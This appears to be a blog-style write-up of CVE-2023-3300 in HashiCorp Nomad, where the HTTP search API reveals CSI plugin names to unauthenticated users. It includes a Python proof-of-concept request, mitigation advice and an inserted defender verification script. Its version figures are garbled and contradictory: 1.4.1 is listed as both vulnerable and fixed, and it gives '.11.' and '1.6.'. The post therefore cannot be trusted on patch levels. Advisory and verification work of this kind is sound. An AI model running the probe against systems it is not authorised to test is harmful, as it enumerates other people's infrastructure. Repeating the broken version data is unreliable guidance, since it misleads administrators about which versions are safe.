HashiCorp Nomad and Nomad Enterprise versions .11. up to 1.5.6 and 1.4.1 contain a security vulnerability (CVE-2023-3300) in their HTTP search API. This vulnerability allows unauthorized users or users without the plugin:read policy to access and reveal the names of the available Container Storage Interface (CSI) plugins.

This post will outline the details of this vulnerability, provide a code snippet demonstrating the exploit, and discuss the necessary steps required to mitigate the issue. Furthermore, we will provide links to the original references and technical details related to this security flaw.

Exploit Details

HashiCorp Nomad is an orchestration platform that is used to manage the deployment and execution of applications across multiple distributed resources. It uses a set of CSI plugins to enable the seamless integration of storage systems with containerized applications. CSI plugins can only be accessed by users with the necessary permissions, as defined in the plugin:read policy.

The HTTP search API implements a search feature that enables users to query the Nomad cluster for various objects. Under normal circumstances, the API would require authorization before granting access to information about the available CSI plugins. However, this security vulnerability (CVE-2023-3300) allows unauthorized users or users without the plugin:read policy to use the HTTP search API and bypass these security checks.

Here is a code snippet demonstrating the exploit:

import requests

# Placeholder address; replace with the Nomad server under test.
nomad_api_url = "http://<nomad_server_ip>:<nomad_api_port>/v1/search"

query = {
    "Prefix": "",  # Can be customized to search for specific plugins
    "Context": "plugins"
}

# No X-Nomad-Token header is sent, so this is an anonymous request.
response = requests.post(nomad_api_url, json=query, timeout=10)
response.raise_for_status()

# The Search API answers {"Matches": {"plugins": [<plugin ID>, ...]}};
# each match is a plugin ID string, not an object with ID/Name fields.
plugin_ids = response.json().get("Matches", {}).get("plugins", [])

for plugin_id in plugin_ids:
    print(f"Plugin ID: {plugin_id}")

This simple Python script sends a search query to the Nomad HTTP search API. If the API is vulnerable, it will respond with the list of available CSI plugins even without authentication or the necessary policy permissions.

Mitigation

The best and most effective way to address this vulnerability is by upgrading your HashiCorp Nomad and Nomad Enterprise clusters. The security issue has been fixed in the following versions:

- 1.6. (for the 1.6.x series)
- 1.5.7 (for the 1.5.x series)
- 1.4.1 (for the 1.4.x series)

If you are unable to upgrade your clusters immediately, you can minimize the likelihood of exploitation by:

- Restricting network access to the Nomad HTTP API (and therefore to /v1/search) with firewall rules or security groups, so that only trusted hosts can reach the Nomad servers.
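To confirm that an upgrade or network restriction actually closed the hole, the following added example (not code from the original post or from HashiCorp) sends the same anonymous search request and classifies the answer the way a defender would. It assumes the Search API response shape {"Matches": {"plugins": [...]}} and that Nomad reports an ACL denial as HTTP 403; with ACLs disabled every endpoint is open by design, so the probe is reported as inconclusive rather than as a finding.

```python
"""Defender-side verification for CVE-2023-3300 (added example)."""
import json
import urllib.error
import urllib.request

# Same body the post uses: list every CSI plugin ID.
SEARCH_BODY = {"Prefix": "", "Context": "plugins"}


def classify(acl_enabled: bool, status: int, body: str) -> str:
    """Return 'exposed', 'patched' or 'inconclusive' for one probe result."""
    if not acl_enabled:
        # With ACLs off, anonymous reads are allowed on purpose; the CVE
        # is moot and a 200 proves nothing about the patch level.
        return "inconclusive"
    if status == 403:
        return "patched"  # anonymous plugin search correctly denied
    if status == 200:
        try:
            data = json.loads(body)
        except ValueError:
            return "inconclusive"
        matches = data.get("Matches", {}) if isinstance(data, dict) else {}
        if "plugins" in matches:
            return "exposed"  # plugin IDs returned without plugin:read
    return "inconclusive"


def probe(nomad_addr: str, acl_enabled: bool, timeout: float = 5.0) -> str:
    """POST /v1/search with no X-Nomad-Token header and classify the reply.

    nomad_addr is a placeholder such as http://127.0.0.1:4646 (assumption).
    """
    req = urllib.request.Request(
        f"{nomad_addr.rstrip('/')}/v1/search",
        data=json.dumps(SEARCH_BODY).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify(acl_enabled, resp.status, resp.read().decode())
    except urllib.error.HTTPError as err:
        # Nomad's ACL denial arrives here as an HTTPError with code 403.
        return classify(acl_enabled, err.code, err.read().decode())


if __name__ == "__main__":
    print(probe("http://127.0.0.1:4646", acl_enabled=True))
```

Run it against a cluster with ACLs enabled: "patched" is the expected result after upgrading, "exposed" means anonymous clients can still enumerate CSI plugin IDs.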

Conclusion

In this post, we have provided an overview of the CVE-2023-3300 vulnerability affecting HashiCorp Nomad and Nomad Enterprise clusters running versions .11. up to 1.5.6 and 1.4.1. This security issue can lead to unauthorized exposure of CSI plugin names via the HTTP search API. We recommend that you immediately upgrade to the latest released versions (1.6., 1.5.7, or 1.4.1) to mitigate this risk and secure your clusters.

Original References

- Nomad Advisory: CVE-2023-3300
- HashiCorp Nomad Security

Timeline

Published on: 07/20/2023 00:15:00 UTC
Last modified on: 07/27/2023 19:22:00 UTC